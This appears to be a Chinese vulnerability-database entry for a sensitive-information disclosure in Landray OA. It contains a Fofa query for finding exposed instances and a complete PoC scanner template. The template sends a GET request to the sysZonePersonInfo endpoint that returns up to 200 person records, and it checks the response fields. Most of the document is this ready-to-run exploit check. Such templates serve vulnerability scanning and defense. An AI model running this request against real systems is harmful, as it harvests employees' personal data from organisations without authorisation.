landray-syszonepersoninfo-disclosure: 蓝凌OA sysZonePersonInfo 敏感信息泄露

日期: 2025-09-01 | 影响软件: 蓝凌OA | POC: 已公开

漏洞描述

Fofa: app="Landray-OA系统"

PoC代码[已公开]

id: landray-syszonepersoninfo-disclosure

info:
  name: 蓝凌OA sysZonePersonInfo 敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="Landray-OA系统"
  reference:
    - https://mp.weixin.qq.com/s/MWq2SWS04mm7caKHK2szZA
  tags: landray,disclosure
  created: 2024/02/29

rules:
  r0:
    request:
      method: GET
      path: /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=200&s_ajax=true
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"columns":') && 
      response.body.bcontains(b'"title":') && 
      response.body.bcontains(b'"property":') && 
      response.body.bcontains(b'"currentPage":') && 
      response.body.bcontains(b'"pageSize":')
expression: r0()

相关漏洞推荐